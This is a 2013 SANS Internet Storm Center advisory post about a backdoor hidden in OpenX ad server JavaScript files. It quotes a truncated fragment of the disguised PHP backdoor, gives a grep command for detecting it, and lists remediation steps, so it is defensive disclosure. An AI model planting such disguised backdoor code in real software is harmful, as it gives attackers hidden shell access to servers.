ISC StormCast for Tuesday, August 6th 2013
Mozilla releases Firefox v 23.0 and Thunderbird v 17.0.8 to address security vulnerabilities
PuTTY 0.63 released: 4 security updates

OpenX Ad Server Backdoor

Published: 2013-08-06
Last Updated: 2013-08-06 11:28:36 UTC
by Johannes Ullrich (Version: 1)
2 comment(s)

According to a post by Heise Security, a backdoor has been spotted in the popular open source ad software OpenX [1][2]. Appearantly the backdoor has been present since at least November 2012. I tried to download the source to verify the information, but it appears the files have been removed. 

The backdoor is disguised as php code that appears to create a jQuery javascript snippet:

this.each(function(){l=flashembed(this,k,j)}<!--?php /*if(e)
*/$j='ex'./**/'plode'; /* if(this.className ...

Heise recommends to search the ".js" files of OpenX for php code to find out if your version of OpenX is the backdoored version.

find . -name \*.js -exec grep -l '<?php' {} \;

The backdoor can then be used by an attacker to upload a shell to www/images/debugs.php . We have seen in the past several web sites that delivered malicious ads served by compromissed ad servers. This could be the reason for some of these compromisses. 

If you run OpenX:

  • verify the above information (and let us know)
  • if you can find the backdoor, disable/ininstall OpenX
  • make sure you remove the "debug.php" file
  • best: rebuild the server if you can

Heise investigated a version 2.8.10 of OpenX with a data of December 9th and an md5 of 6b3459f16238aa717f379565650cb0cf for the file.

[1] (only in German at this point)

Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter @johullrich




2 comment(s)
ISC StormCast for Tuesday, August 6th 2013


Diary Archives